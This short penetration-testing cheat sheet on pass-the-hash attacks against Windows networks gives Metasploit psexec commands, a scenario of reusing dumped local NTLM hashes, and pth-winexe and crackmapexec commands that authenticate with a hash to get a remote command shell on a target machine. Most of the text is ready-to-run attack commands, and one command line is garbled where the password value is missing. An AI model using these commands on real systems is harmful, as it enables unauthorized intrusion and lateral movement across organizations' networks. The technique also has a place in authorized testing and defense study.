MSF:

msf exploit(psexec)> set SMBUser mike

msf exploit(psexec)> set SMBPass : //note if you only have one then place 32 0's on the other side of the : msf exploit(psexec)> run

Allows an attacker to authenticate to a remote target by using a valid combination of username and NTLM/LM hash rather than a cleartext password. This is possible because NTLM/LM password hashes are not salted and remain static between sessions and computers whose combination of username and password is the same.

Consider the following scenario: An organization uses disk-imaging technologies within its network, or otherwise has a local administrative user enabled on multiple computers. A vulnerability on one of these computers has provided us with SYSTEM privileges, through which we dumped local LM and NTLM hashes. We copy the local administrator NTLM hash and use this discovered hash instead of a password with a patched version of pth-winexe to gain a shell on a different machine, which has the same local administrator / password combination. We begin by first setting an environment variable called SMBHASH, containing the password hash we would like to use for authentication.

#exportSMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896

We can then use the pth-winexe tool to authenticate using the password hash and gain a remote command prompt on the target machine:

#pth-winexe -U administrator% //10.11.01.76 cmd

//WIth crackmapexec #crackmapexec smb <target(s)> -u username -H LMHASH:NTHASH

#crackmapexec smb <target(s)> -u username -H NTHASH